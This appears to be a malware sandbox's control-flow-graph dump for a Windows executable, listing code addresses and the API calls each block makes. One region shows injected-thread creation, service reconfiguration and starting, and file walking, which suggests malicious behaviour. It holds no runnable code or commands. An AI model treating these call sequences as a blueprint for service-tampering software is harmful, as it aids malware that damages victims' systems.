108781 425728 108776->108781 108802 4233a1 DecodePointer 108777->108802 108779 42579d 108803 428b28 58 API calls __getptd_noexit 108779->108803 108783 425733 108781->108783 108784 42575b RtlAllocateHeap 108781->108784 108787 425783 108781->108787 108791 425781 108781->108791 108799 4233a1 DecodePointer 108781->108799 108783->108781 108796 42a16b 58 API calls __NMSG_WRITE 108783->108796 108797 42a1c8 58 API calls 6 library calls 108783->108797 108798 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108783->108798 108784->108781 108785 42578f 108784->108785 108785->108768 108800 428b28 58 API calls __getptd_noexit 108787->108800 108801 428b28 58 API calls __getptd_noexit 108791->108801 108793->108768 108794->108772 108795->108774 108796->108783 108797->108783 108799->108781 108800->108791 108801->108785 108802->108779 108803->108785 108805 40818f 108804->108805 108808 4081aa 108804->108808 108953 407e4f 108805->108953 108807 408197 CharUpperBuffW 108807->108808 108808->108683 108810 40f251 108809->108810 108811 40f272 108810->108811 108957 469e4a 89 API calls 4 library calls 108810->108957 108811->108723 108814 40838d 108813->108814 108815 43edbd 108813->108815 108816 420db6 Mailbox 59 API calls 108814->108816 108817 408394 108816->108817 108818 4083b5 108817->108818 108958 408634 59 API calls Mailbox 108817->108958 108818->108702 108818->108711 108821 444cc3 108820->108821 108835 4109f5 108820->108835 109022 469e4a 89 API calls 4 library calls 108821->109022 108823 410cfa 108823->108732 108825 410ee4 108825->108823 108827 410ef1 108825->108827 109020 411093 341 API calls Mailbox 108827->109020 108828 410a4b PeekMessageW 108895 410a05 Mailbox 108828->108895 108830 410ef8 LockWindowUpdate DestroyWindow GetMessageW 108830->108823 108833 410f2a 108830->108833 108832 444e81 Sleep 108832->108895 108837 445c58 TranslateMessage DispatchMessageW GetMessageW 108833->108837 108834 410ce4 108834->108823 109019 411070 10 API calls Mailbox 108834->109019 
108835->108895 109023 409e5d 60 API calls 108835->109023 109024 456349 341 API calls 108835->109024 108837->108837 108838 445c88 108837->108838 108838->108823 108839 410e43 PeekMessageW 108839->108895 108840 410ea5 TranslateMessage DispatchMessageW 108840->108839 108841 444d50 TranslateAcceleratorW 108841->108839 108841->108895 108842 409e5d 60 API calls 108842->108895 108843 410d13 timeGetTime 108843->108895 108844 44581f WaitForSingleObject 108846 44583c GetExitCodeProcess CloseHandle 108844->108846 108844->108895 108879 410f95 108846->108879 108847 410e5f Sleep 108881 410e70 Mailbox 108847->108881 108848 408047 59 API calls 108848->108895 108851 420db6 59 API calls Mailbox 108851->108895 108852 445af8 Sleep 108852->108881 108854 42049f timeGetTime 108854->108881 108855 410f4e timeGetTime 109021 409e5d 60 API calls 108855->109021 108858 445b8f GetExitCodeProcess 108860 445ba5 WaitForSingleObject 108858->108860 108861 445bbb CloseHandle 108858->108861 108860->108861 108860->108895 108861->108881 108864 485f25 110 API calls 108864->108881 108865 40b7dd 109 API calls 108865->108881 108866 445874 108866->108879 108867 445c17 Sleep 108867->108895 108868 445078 Sleep 108868->108895 108875 409ea0 314 API calls 108875->108895 108877 40fce0 314 API calls 108877->108895 108879->108732 108881->108854 108881->108858 108881->108864 108881->108865 108881->108866 108881->108867 108881->108868 108881->108879 108881->108895 109049 407667 108881->109049 109054 462408 60 API calls 108881->109054 109055 409e5d 60 API calls 108881->109055 109056 407de1 108881->109056 109060 4089b3 69 API calls Mailbox 108881->109060 109061 40b73c 341 API calls 108881->109061 109062 4564da 60 API calls 108881->109062 109063 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108881->109063 109064 463c55 66 API calls Mailbox 108881->109064 108882 469e4a 89 API calls 108882->108895 108884 4084c0 69 API calls 108884->108895 108885 4089b3 69 API calls 
108885->108895 108886 409c90 59 API calls Mailbox 108886->108895 108887 45617e 59 API calls Mailbox 108887->108895 108889 407de1 59 API calls 108889->108895 108890 4455d5 VariantClear 108890->108895 108891 456e8f 59 API calls 108891->108895 108892 44566b VariantClear 108892->108895 108893 408cd4 59 API calls Mailbox 108893->108895 108894 445419 VariantClear 108894->108895 108895->108828 108895->108832 108895->108834 108895->108839 108895->108840 108895->108841 108895->108842 108895->108843 108895->108844 108895->108847 108895->108848 108895->108851 108895->108852 108895->108855 108895->108875 108895->108877 108895->108879 108895->108881 108895->108882 108895->108884 108895->108885 108895->108886 108895->108887 108895->108889 108895->108890 108895->108891 108895->108892 108895->108893 108895->108894 108896 40b73c 314 API calls 108895->108896 108959 40e420 108895->108959 108966 40e6a0 108895->108966 108997 40f460 108895->108997 109018 4031ce IsDialogMessageW GetClassLongW 108895->109018 109025 486018 59 API calls 108895->109025 109026 469a15 59 API calls Mailbox 108895->109026 109027 45d4f2 59 API calls 108895->109027 109028 409837 108895->109028 109046 4560ef 59 API calls 2 library calls 108895->109046 109047 408401 59 API calls 108895->109047 109048 4082df 59 API calls Mailbox 108895->109048 108896->108895 108897->108755 108898->108745 108899->108739 108900->108739 108902 409ebf 108901->108902 108920 409eed Mailbox 108901->108920 108903 420db6 Mailbox 59 API calls 108902->108903 108903->108920 108904 40b475 108905 408047 59 API calls 108904->108905 108919 40a057 108905->108919 108906 456e8f 59 API calls 108906->108920 108907 40b47a 108908 440055 108907->108908 108923 4409e5 108907->108923 110567 469e4a 89 API calls 4 library calls 108908->110567 108909 407667 59 API calls 108909->108920 108911 420db6 59 API calls Mailbox 108911->108920 108914 422d40 67 API calls __cinit 108914->108920 108915 440064 108915->108723 108918 408047 59 API calls 108918->108920 
calls 110696->110697 110698 40553c 110697->110698 110699 4054d2 110698->110699 110713 4058cf 110699->110713 110701 405514 110701->110693 110705 408061 MultiByteToWideChar 110701->110705 110703 4054e3 110703->110701 110720 405bc0 110703->110720 110726 405a7a 110703->110726 110706 408087 110705->110706 110707 4080ce 110705->110707 110709 420db6 Mailbox 59 API calls 110706->110709 110708 407d8c 59 API calls 110707->110708 110712 4080c0 110708->110712 110710 40809c MultiByteToWideChar 110709->110710 110743 40774d 59 API calls 2 library calls 110710->110743 110712->110693 110714 4058e0 110713->110714 110715 43dc3c 110713->110715 110714->110703 110735 455ecd 59 API calls Mailbox 110715->110735 110717 43dc46 110718 420db6 Mailbox 59 API calls 110717->110718 110719 43dc52 110718->110719 110721 405c33 110720->110721 110722 405bce 110720->110722 110736 405c4e SetFilePointerEx 110721->110736 110723 405bf6 110722->110723 110725 405c06 ReadFile 110722->110725 110723->110703 110725->110722 110725->110723 110727 43dcee 110726->110727 110728 405a8e 110726->110728 110742 455ecd 59 API calls Mailbox 110727->110742 110737 4059b9 110728->110737 110731 405a9a 110731->110703 110732 43dcf9 110733 420db6 Mailbox 59 API calls 110732->110733 110734 43dd0e _memmove 110733->110734 110735->110717 110736->110722 110738 4059d1 110737->110738 110741 4059ca _memmove 110737->110741 110739 43dc7e 110738->110739 110740 420db6 Mailbox 59 API calls 110738->110740 110740->110741 110741->110731 110742->110732 110743->110712 110744 167520c 110747 169cbd0 110744->110747 110746 1675211 110757 169be50 _wcslen 110747->110757 110748 169c168 110786 169a905 LocalFree 110748->110786 110751 169c78e CloseServiceHandle 110751->110757 110752 169bffd StrStrIW 110752->110757 110753 169c706 StrStrIW 110753->110757 110755 169bf68 StrStrIW 110755->110757 110756 169c72b StrStrIW 110756->110757 110757->110746 110757->110747 110757->110748 110757->110751 110757->110752 110757->110753 110757->110755 110757->110756 110758 
169c0fd CloseServiceHandle 110757->110758 110759 169bfe9 110757->110759 110760 169c399 StrStrIW 110757->110760 110761 169bf7e 110757->110761 110764 169c7e4 StartServiceW 110757->110764 110766 169c65a ChangeServiceConfigW 110757->110766 110767 167ce90 110757->110767 110785 169a350 CloseServiceHandle 110757->110785 110787 1675d20 110757->110787 110758->110757 110759->110746 110760->110757 110763 169c3a9 110760->110763 110761->110764 110765 169c36b OpenServiceW 110761->110765 110763->110746 110764->110757 110765->110757 110766->110757 110766->110759 110778 167cc9b _wcslen 110767->110778 110768 1675d20 VirtualAlloc VirtualFree 110768->110778 110769 167d5c5 CreateFileW 110769->110778 110770 167d729 GetFileSizeEx 110771 167d8a1 CloseHandle 110770->110771 110770->110778 110771->110778 110772 167d42a CloseHandle 110772->110778 110774 167cd5c lstrcmpiW 110774->110778 110775 167cca0 lstrcmpiW 110775->110778 110776 167d049 SetFilePointerEx 110776->110778 110778->110757 110778->110767 110778->110768 110778->110769 110778->110770 110778->110771 110778->110772 110778->110774 110778->110775 110778->110776 110779 167d378 CloseHandle 110778->110779 110780 167d426 110778->110780 110781 167cfbb GetFileTime 110778->110781 110782 167cc92 110778->110782 110784 167d903 110778->110784 110792 1678937 VirtualAlloc VirtualFree 110778->110792 110793 1678470 VirtualAlloc VirtualFree 110778->110793 110779->110778 110780->110771 110780->110772 110781->110778 110782->110757 110783 16afdfc 40 API calls 110783->110784 110784->110782 110784->110783 110785->110757 110786->110759 110788 1675d22 110787->110788 110788->110757 110789 1675d39 VirtualAlloc 110788->110789 110791 1675d46 VirtualFree 110788->110791 110789->110788 110791->110757 110792->110778 110794 40e5ab 110797 40d100 110794->110797 110796 40e5b9 110798 40d11d 110797->110798 110815 40d37d 110797->110815 110799 4426e0 110798->110799 110800 442691 110798->110800 110821 40d144 110798->110821 110841 47a3e6 341 API calls __cinit 110799->110841 
110802 442694 110800->110802 110811 4426af 110800->110811 110804 4426a0 110802->110804 110802->110821 110839 47a9fa 341 API calls 110804->110839 110805 422d40 __cinit 67 API calls 110805->110821 110808 40d434 110833 408a52 68 API calls 110808->110833 110809 4428b5 110809->110809 110810 40d54b 110810->110796 110811->110815 110840 47aea2 341 API calls 3 library calls 110811->110840 110815->110810 110846 469e4a 89 API calls 4 library calls 110815->110846 110816 4427fc 110845 47a751 89 API calls 110816->110845 110817 40d443 110817->110796 110820 4084c0 69 API calls 110820->110821 110821->110805 110821->110808 110821->110810 110821->110815 110821->110816 110821->110820 110828 409ea0 341 API calls 110821->110828 110829 408047 59 API calls 110821->110829 110831 408740 68 API calls __cinit 110821->110831 110832 408542 68 API calls 110821->110832 110834 40843a 68 API calls 110821->110834 110835 40cf7c 341 API calls 110821->110835 110836 409dda 59 API calls Mailbox 110821->110836 110837 40cf00 89 API calls 110821->110837 110838 40cd7d 341 API calls 110821->110838 110842 408a52 68 API calls 110821->110842 110843 409d3c 60 API calls Mailbox 110821->110843 110844 45678d 60 API calls 110821->110844 110828->110821 110829->110821 110831->110821 110832->110821 110833->110817 110834->110821 110835->110821 110836->110821 110837->110821 110838->110821 110839->110810 110840->110815 110841->110821 110842->110821 110843->110821 110844->110821 110845->110815 110846->110809 110847 40e48c 110850 40ccba 110847->110850 110849 40e498 110851 40ccd2 110850->110851 110852 40cd26 110850->110852 110851->110852 110853 409ea0 341 API calls 110851->110853 110856 40cd4f 110852->110856 110860 469e4a 89 API calls 4 library calls 110852->110860 110857 40cd09 110853->110857 110855 4425bc 110855->110855 110856->110849 110857->110856 110859 409d3c 60 API calls Mailbox 110857->110859 110859->110852 110860->110855 110861 40b40e 110862 41f944 60 API calls 110861->110862 110863 40b424 110862->110863 110869 
40c5a7 110863->110869 110865 40b44c 110866 40a388 110865->110866 110881 469e4a 89 API calls 4 library calls 110865->110881 110868 4408e9 110870 407a16 59 API calls 110869->110870 110871 40c5cc _wcscmp 110870->110871 110872 407de1 59 API calls 110871->110872 110875 40c600 Mailbox 110871->110875 110873 441691 110872->110873 110874 407b2e 59 API calls 110873->110874 110876 44169c 110874->110876 110875->110865 110882 40843a 68 API calls 110876->110882 110878 4416ad 110880 4416b1 Mailbox 110878->110880 110883 409d3c 60 API calls Mailbox 110878->110883 110880->110865 110881->110868 110882->110878 110883->110880 110884 b65378 110898 b62fc8 110884->110898 110886 b6544c 110901 b65268 110886->110901 110900 b63653 110898->110900 110904 b66478 GetPEB 110898->110904 110900->110886 110902 b65271 Sleep 110901->110902 110903 b6527f 110902->110903 110904->110900 110905 403633 110906 40366a 110905->110906 110907 4036e7 110906->110907 110908 403688 110906->110908 110946 4036e5 110906->110946 110912 4036ed 110907->110912 110913 43d0cc 110907->110913 110909 403695 110908->110909 110910 40374b PostQuitMessage 110908->110910 110917 4036a0 110909->110917 110918 43d154 110909->110918 110919 4036d8 110910->110919 110911 4036ca DefWindowProcW 110911->110919 110914 4036f2 110912->110914 110915 403715 SetTimer RegisterWindowMessageW 110912->110915 110954 411070 10 API calls Mailbox 110913->110954 110920 4036f9 KillTimer 110914->110920 110921 43d06f 110914->110921 110915->110919 110923 40373e CreatePopupMenu 110915->110923 110924 403755 110917->110924 110925 4036a8 110917->110925 110970 462527 71 API calls _memset 110918->110970 110950 40443a Shell_NotifyIconW _memset 110920->110950 110933 43d074 110921->110933 110934 43d0a8 MoveWindow 110921->110934 110922 43d0f3 110955 411093 341 API calls Mailbox 110922->110955 110923->110919 110952 4044a0 64 API calls _memset 110924->110952 110929 4036b3 110925->110929 110930 43d139 110925->110930 110936 4036be 110929->110936 110937 43d124 110929->110937 
110930->110911 110969 457c36 59 API calls Mailbox 110930->110969 110931 43d166 110931->110911 110931->110919 110939 43d097 SetFocus 110933->110939 110940 43d078 110933->110940 110934->110919 110935 40370c 110951 403114 DeleteObject DestroyWindow Mailbox 110935->110951 110936->110911 110956 40443a Shell_NotifyIconW _memset 110936->110956 110968 462d36 81 API calls _memset 110937->110968 110938 403764 110938->110919 110939->110919 110940->110936 110944 43d081 110940->110944 110953 411070 10 API calls Mailbox 110944->110953 110946->110911 110948 43d118 110957 40434a 110948->110957 110950->110935 110951->110919 110952->110938 110953->110919 110954->110922 110955->110936 110956->110948 110958 404375 _memset 110957->110958 110971 404182 110958->110971 110961 4043fa 110963 404430 Shell_NotifyIconW 110961->110963 110964 404414 Shell_NotifyIconW 110961->110964 110965 404422 110963->110965 110964->110965 110975 40407c 110965->110975 110967 404429 110967->110946 110968->110938 110969->110946 110970->110931 110972 43d423 110971->110972 110973 404196 110971->110973 110972->110973 110974 43d42c DestroyIcon 110972->110974 110973->110961 110997 462f94 62 API calls _W_store_winword 110973->110997 110974->110973 110976 404098 110975->110976 110977 40416f Mailbox 110975->110977 110978 407a16 59 API calls 110976->110978 110977->110967 110979 4040a6 110978->110979 110980 4040b3 110979->110980 110981 43d3c8 LoadStringW 110979->110981 110982 407bcc 59 API calls 110980->110982 110984 43d3e2 110981->110984 110983 4040c8 110982->110983 110983->110984 110985 4040d9 110983->110985 110986 407b2e 59 API calls 110984->110986 110987 4040e3 110985->110987 110988 404174 110985->110988 110991 43d3ec 110986->110991 110990 407b2e 59 API calls 110987->110990 110989 408047 59 API calls 110988->110989 110994 4040ed _memset _wcscpy 110989->110994 110990->110994 110992 407cab 59 API calls 110991->110992 110991->110994 110993 43d40e 110992->110993 110996 407cab 59 API calls 110993->110996 110995 404155 
Shell_NotifyIconW 110994->110995 110995->110977 110996->110994 110997->110961 110998 427c56 110999 427c62 110998->110999 111035 429e08 GetStartupInfoW 110999->111035 111002 427cbf 111004 427cca 111002->111004 111120 427da6 58 API calls 3 library calls 111002->111120 111003 427c67 111037 428b7c GetProcessHeap 111003->111037 111038 429ae6 111004->111038 111007 427cd0 111008 427cdb __RTC_Initialize 111007->111008 111121 427da6 58 API calls 3 library calls 111007->111121 111059 42d5d2 111008->111059 111011 427cea 111012 427cf6 GetCommandLineW 111011->111012 111122 427da6 58 API calls 3 library calls 111011->111122 111078 434f23 GetEnvironmentStringsW 111012->111078 111015 427cf5 111015->111012 111018 427d10 111019 427d1b 111018->111019 111123 4230b5 58 API calls 3 library calls 111018->111123 111088 434d58 111019->111088 111022 427d21 111023 427d2c 111022->111023 111124 4230b5 58 API calls 3 library calls 111022->111124 111102 4230ef 111023->111102 111026 427d34 111027 427d3f __wwincmdln 111026->111027 111125 4230b5 58 API calls 3 library calls 111026->111125 111108 4047d0 111027->111108 111030 427d53 111031 427d62 111030->111031 111126 423358 58 API calls _doexit 111030->111126 111127 4230e0 58 API calls _doexit 111031->111127 111034 427d67 __write 111036 429e1e 111035->111036 111036->111003 111037->111002 111128 423187 36 API calls 2 library calls 111038->111128 111040 429aeb 111129 429d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 111040->111129 111042 429af0 111043 429af4 111042->111043 111131 429d8a TlsAlloc 111042->111131 111130 429b5c 61 API calls 2 library calls 111043->111130 111046 429af9 111046->111007 111047 429b06 111047->111043 111048 429b11 111047->111048 111132 4287d5 111048->111132 111051 429b53 111140 429b5c 61 API calls 2 library calls 111051->111140 111054 429b58 111054->111007 111055 429b32 111055->111051 111056 429b38 111055->111056 111139 429a33 58 API calls 4 library calls 111056->111139 111058 429b40 GetCurrentThreadId 111058->111007 
111060 42d5de __write 111059->111060 111061 429c0b __lock 58 API calls 111060->111061 111062 42d5e5 111061->111062 111063 4287d5 __calloc_crt 58 API calls 111062->111063 111064 42d5f6 111063->111064 111065 42d661 GetStartupInfoW 111064->111065 111066 42d601 __write @_EH4_CallFilterFunc@8 111064->111066 111067 42d676 111065->111067 111068 42d7a5 111065->111068 111066->111011 111067->111068 111071 4287d5 __calloc_crt 58 API calls 111067->111071 111074 42d6c4 111067->111074 111069 42d86d 111068->111069 111072 42d7f2 GetStdHandle 111068->111072 111073 42d805 GetFileType 111068->111073 111153 429e2b InitializeCriticalSectionAndSpinCount 111068->111153 111154 42d87d LeaveCriticalSection _doexit 111069->111154 111071->111067 111072->111068 111073->111068 111074->111068 111075 42d6f8 GetFileType 111074->111075 111152 429e2b InitializeCriticalSectionAndSpinCount 111074->111152 111075->111074 111079 427d06 111078->111079 111080 434f34 111078->111080 111084 434b1b GetModuleFileNameW 111079->111084 111155 42881d 58 API calls 2 library calls 111080->111155 111082 434f5a _memmove 111083 434f70 FreeEnvironmentStringsW 111082->111083 111083->111079 111085 434b4f _wparse_cmdline 111084->111085 111087 434b8f _wparse_cmdline 111085->111087 111156 42881d 58 API calls 2 library calls 111085->111156 111087->111018 111089 434d71 __NMSG_WRITE 111088->111089 111093 434d69 111088->111093 111090 4287d5 __calloc_crt 58 API calls 111089->111090 111098 434d9a __NMSG_WRITE 111090->111098 111091 434df1 111092 422d55 _free 58 API calls 111091->111092 111092->111093 111093->111022 111094 4287d5 __calloc_crt 58 API calls 111094->111098 111095 434e16 111096 422d55 _free 58 API calls 111095->111096 111096->111093 111098->111091 111098->111093 111098->111094 111098->111095 111099 434e2d 111098->111099 111157 434607 58 API calls __ftell_nolock 111098->111157 111158 428dc6 IsProcessorFeaturePresent 111099->111158 111101 434e39 111101->111022 111103 4230fb __IsNonwritableInCurrentImage 111102->111103 
111173 42a4d1 111103->111173 111105 423119 __initterm_e 111106 422d40 __cinit 67 API calls 111105->111106 111107 423138 _doexit __IsNonwritableInCurrentImage 111105->111107 111106->111107 111107->111026 111109 4047ea 111108->111109 111119 404889 111108->111119 111110 404824 IsThemeActive 111109->111110 111176 42336c 111110->111176 111114 404850 111188 4048fd SystemParametersInfoW SystemParametersInfoW 111114->111188 111116 40485c 111189 403b3a 111116->111189 111119->111030 111120->111004 111121->111008 111122->111015 111126->111031 111127->111034 111128->111040 111129->111042 111130->111046 111131->111047 111133 4287dc 111132->111133 111135 428817 111133->111135 111137 4287fa 111133->111137 111141 4351f6 111133->111141 111135->111051 111138 429de6 TlsSetValue 111135->111138 111137->111133 111137->111135 111149 42a132 Sleep 111137->111149 111138->111055 111139->111058 111140->111054 111142 435201 111141->111142 111144 43521c 111141->111144 111143 43520d 111142->111143 111142->111144 111150 428b28 58 API calls __getptd_noexit 111143->111150 111145 43522c HeapAlloc 111144->111145 111147 435212 111144->111147 111151 4233a1 DecodePointer 111144->111151 111145->111144 111145->111147 111147->111133 111149->111137 111150->111147 111151->111144 111152->111074 111153->111068 111154->111066 111155->111082 111156->111087 111157->111098 111159 428dd1 111158->111159 111164 428c59 111159->111164 111163 428dec 111163->111101 111165 428c73 _memset __call_reportfault 111164->111165 111166 428c93 IsDebuggerPresent 111165->111166 111172 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 111166->111172 111168 42c5f6 __ftell_nolock 6 API calls 111170 428d7a 111168->111170 111169 428d57 __call_reportfault 111169->111168 111171 42a140 GetCurrentProcess TerminateProcess 111170->111171 111171->111163 111172->111169 111174 42a4d4 EncodePointer 111173->111174 111174->111174 111175 42a4ee 111174->111175 111175->111105 111177 429c0b __lock 58 API calls 111176->111177 111178 423377 
DecodePointer EncodePointer 111177->111178 111241 429d75 LeaveCriticalSection 111178->111241 111180 404849 111181 4233d4 111180->111181 111182 4233f8 111181->111182 111183 4233de 111181->111183 111182->111114 111183->111182 111242 428b28 58 API calls __getptd_noexit 111183->111242 111185 4233e8 111243 428db6 9 API calls __ftell_nolock 111185->111243 111187 4233f3 111187->111114 111188->111116 111190 403b47 __ftell_nolock 111189->111190 111191 407667 59 API calls 111190->111191 111192 403b51 GetCurrentDirectoryW 111191->111192 111244 403766 111192->111244 111241->111180 111242->111185 111243->111187 111245 407667 59 API calls 111244->111245 111246 40377c 111245->111246 111375 403d31 111246->111375 111248 40379a 111249 404706 61 API calls 111248->111249 111250 4037ae 111249->111250 111251 407de1 59 API calls 111250->111251 111252 4037bb 111251->111252 111253 404ddd 136 API calls 111252->111253 111376 403d3e __ftell_nolock 111375->111376 111377 407bcc 59 API calls 111376->111377 111382 403ea4 Mailbox 111376->111382 111379 403d70 111377->111379 111378 4079f2 59 API calls 111378->111379 111379->111378 111387 403da6 Mailbox 111379->111387 111380 4079f2 59 API calls 111380->111387 111381 403e77 111381->111382 111383 407de1 59 API calls 111381->111383 111382->111248 111385 403e98 111383->111385 111384 407de1 59 API calls 111384->111387 111386 403f74 59 API calls 111385->111386 111386->111382 111387->111380 111387->111381 111387->111382 111387->111384 111442 403f74 111387->111442 111443 403f82 111442->111443 111447 403fa4 _memmove 111442->111447 111446 420db6 Mailbox 59 API calls 111443->111446 111444 420db6 Mailbox 59 API calls 111445 403fb8 111444->111445 111445->111387 111446->111447 111447->111444 111731 401055 111736 402649 111731->111736 111734 422d40 __cinit 67 API calls 111735 401064 111734->111735 111737 407667 59 API calls 111736->111737 111738 4026b7 111737->111738 111743 403582 111738->111743 111741 402754 111742 40105a 111741->111742 111746 403416 59 API calls 
2 library calls 111741->111746 111742->111734 111747 4035b0 111743->111747 111746->111741 111748 4035bd 111747->111748 111749 4035a1 111747->111749 111748->111749 111750 4035c4 RegOpenKeyExW 111748->111750 111749->111741 111750->111749 111751 4035de RegQueryValueExW 111750->111751 111752 403614 RegCloseKey 111751->111752 111753 4035ff 111751->111753 111752->111749 111753->111752 111754 401016 111759 404974 111754->111759 111757 422d40 __cinit 67 API calls 111758 401025 111757->111758 111760 420db6 Mailbox 59 API calls 111759->111760 111761 40497c 111760->111761 111762 40101b 111761->111762 111766 404936 111761->111766 111762->111757 111767 404951 111766->111767 111768 40493f 111766->111768 111770 4049a0 111767->111770 111769 422d40 __cinit 67 API calls 111768->111769 111769->111767 111771 407667 59 API calls 111770->111771 111772 4049b8 GetVersionExW 111771->111772 111773 407bcc 59 API calls 111772->111773 111774 4049fb 111773->111774 111775 407d2c 59 API calls 111774->111775 111778 404a28 111774->111778 111776 404a1c 111775->111776 111777 407726 59 API calls 111776->111777 111777->111778 111779 404a93 GetCurrentProcess IsWow64Process 111778->111779 111781 43d864 111778->111781 111780 404aac 111779->111780 111782 404ac2 111780->111782 111783 404b2b GetSystemInfo 111780->111783 111794 404b37 111782->111794 111784 404af8 111783->111784 111784->111762 111787 404ad4 111790 404b37 2 API calls 111787->111790 111788 404b1f GetSystemInfo 111789 404ae9 111788->111789 111789->111784 111791 404aef FreeLibrary 111789->111791 111792 404adc GetNativeSystemInfo 111790->111792 111791->111784 111792->111789 111795 404ad0 111794->111795 111796 404b40 LoadLibraryA 111794->111796 111795->111787 111795->111788 111796->111795 111797 404b51 GetProcAddress 111796->111797 111797->111795 111798 167aaf0 111799 167ab06 111798->111799 111803 167ab57 111799->111803 111804 1676490 111799->111804 111806 1675f10 111804->111806 111807 1675d90 111804->111807 111805 1676084 SetFilePointerEx 
111805->111806 111806->111805 111806->111807 111808 16afaf0 111807->111808 111809 16afafd 111808->111809 111813 16afb84 111808->111813 111811 16afb2a 111809->111811 111809->111813 111815 16b032f 111811->111815 111827 16b1a1b 21 API calls 2 library calls 111811->111827 111812 16b08d6 111812->111803 111814 16afc05 111813->111814 111823 16afbda 111813->111823 111820 16afc38 111814->111820 111826 16b0fe0 21 API calls __startOneArgErrorHandling 111814->111826 111815->111803 111817 16afc22 111817->111803 111818 16b116e 111829 16b0fe0 21 API calls __startOneArgErrorHandling 111818->111829 111819 16b1167 111828 16b0ff7 21 API calls __startOneArgErrorHandling 111819->111828 111820->111803 111823->111818 111823->111819 111823->111820 111824 16b116c 111824->111803 111825 16b1173 111825->111803 111826->111817 111827->111812 111828->111824 111829->111825 111830 401078 111835 40708b 111830->111835 111832 40108c 111833 422d40 __cinit 67 API calls 111832->111833 111834 401096 111833->111834 111836 40709b __ftell_nolock 111835->111836 111837 407667 59 API calls 111836->111837 111838 407151 111837->111838 111839 404706 61 API calls 111838->111839 111840 40715a 111839->111840 111866 42050b 111840->111866 111843 407cab 59 API calls 111844 407173 111843->111844 111845 403f74 59 API calls 111844->111845 111846 407182 111845->111846 111847 407667 59 API calls 111846->111847 111848 40718b 111847->111848 111849 407d8c 59 API calls 111848->111849 111850 407194 RegOpenKeyExW 111849->111850 111851 43e8b1 RegQueryValueExW 111850->111851 111855 4071b6 Mailbox 111850->111855 111852 43e943 RegCloseKey 111851->111852 111853 43e8ce 111851->111853 111852->111855 111865 43e955 _wcscat Mailbox __NMSG_WRITE 111852->111865 111854 420db6 Mailbox 59 API calls 111853->111854 111856 43e8e7 111854->111856 111855->111832 111857 40522e 59 API calls 111856->111857 111859 43e8f2 RegQueryValueExW 111857->111859 111858 4079f2 59 API calls 111858->111865 111860 43e90f 111859->111860 111862 43e929 111859->111862 
111861 407bcc 59 API calls 111860->111861 111861->111862 111862->111852 111863 407de1 59 API calls 111863->111865 111864 403f74 59 API calls 111864->111865 111865->111855 111865->111858 111865->111863 111865->111864 111867 431940 __ftell_nolock 111866->111867 111868 420518 GetFullPathNameW 111867->111868 111869 42053a 111868->111869 111870 407bcc 59 API calls 111869->111870 111871 407165 111870->111871 111871->111843 111872 1675a3b 111873 1675a45 111872->111873 111878 1674f7c 111872->111878 111874 16751ae 111873->111874 111875 1675a4b CreateThread 111873->111875 111877 1675a59 RtlExitUserThread 111875->111877 111876 1674f88 111882 1675b1d 111877->111882 111878->111876 111880 1675d20 2 API calls 111878->111880 111881 1674f99 111880->111881 111883 1675d20 2 API calls 111882->111883 111884 1675b3c 111883->111884 111885 43fdfc 111890 40ab30 Mailbox _memmove 111885->111890 111887 45617e Mailbox 59 API calls 111909 40a057 111887->111909 111889 420db6 59 API calls Mailbox 111889->111890 111890->111889 111892 40b525 111890->111892 111890->111909 111911 407de1 59 API calls 111890->111911 111915 409f37 Mailbox 111890->111915 111917 47bc6b 341 API calls 111890->111917 111919 40b2b6 111890->111919 111921 409ea0 341 API calls 111890->111921 111922 44086a 111890->111922 111924 440878 111890->111924 111926 44085c 111890->111926 111927 40b21c 111890->111927 111930 456e8f 59 API calls 111890->111930 111933 468715 61 API calls 111890->111933 111937 47445a 341 API calls 111890->111937 111938 46d07b 111890->111938 111985 411fc3 111890->111985 112025 482141 111890->112025 112063 47df23 111890->112063 112066 47c2e0 111890->112066 112098 467956 111890->112098 112104 45617e 111890->112104 112109 409c90 59 API calls Mailbox 111890->112109 112113 47c193 85 API calls 2 library calls 111890->112113 112115 469e4a 89 API calls 4 library calls 111892->112115 111894 4409e5 112120 469e4a 89 API calls 4 library calls 111894->112120 111895 440055 112114 469e4a 89 API calls 4 library calls 
111895->112114 111898 40b475 111904 408047 59 API calls 111898->111904 111900 40b47a 111900->111894 111900->111895 111901 420db6 59 API calls Mailbox 111901->111915 111902 440064 111904->111909 111907 408047 59 API calls 111907->111915 111908 407667 59 API calls 111908->111915 111910 422d40 67 API calls __cinit 111910->111915 111911->111890 111912 456e8f 59 API calls 111912->111915 111913 4409d6 112119 469e4a 89 API calls 4 library calls 111913->112119 111915->111895 111915->111898 111915->111900 111915->111901 111915->111907 111915->111908 111915->111909 111915->111910 111915->111912 111915->111913 111916 40a55a 111915->111916 112107 40c8c0 341 API calls 2 library calls 111915->112107 112108 40b900 60 API calls Mailbox 111915->112108 112118 469e4a 89 API calls 4 library calls 111916->112118 111917->111890 112112 40f6a3 341 API calls 111919->112112 111921->111890 112116 409c90 59 API calls Mailbox 111922->112116 112117 469e4a 89 API calls 4 library calls 111924->112117 111926->111887 111926->111909 112110 409d3c 60 API calls Mailbox 111927->112110 111929 40b22d 112111 409d3c 60 API calls Mailbox 111929->112111 111930->111890 111933->111890 111937->111890 111939 46d09a 111938->111939 111940 46d0a5 111938->111940 112121 409b3c 59 API calls 111939->112121 111943 407667 59 API calls 111940->111943 111983 46d17f Mailbox 111940->111983 111942 420db6 Mailbox 59 API calls 111944 46d1c8 111942->111944 111945 46d0c9 111943->111945 111946 46d1d4 111944->111946 112124 4057a6 60 API calls Mailbox 111944->112124 111947 407667 59 API calls 111945->111947 111949 409837 84 API calls 111946->111949 111950 46d0d2 111947->111950 111951 46d1ec 111949->111951 111952 409837 84 API calls 111950->111952 111953 4057f6 67 API calls 111951->111953 111954 46d0de 111952->111954 111955 46d1fb 111953->111955 111956 40459b 59 API calls 111954->111956 111957 46d233 111955->111957 111958 46d1ff GetLastError 111955->111958 111959 46d0f3 111956->111959 111962 46d295 111957->111962 111963 46d25e 
                                                        control_flow_graph (continuation; node and edge listing elided): basic blocks between 004054D2 and 0048228A, calling CloseHandle, ReadFile, SetFilePointerEx, CharUpperBuffW and _memmove
                                                        Strings
                                                        Memory Dump Source
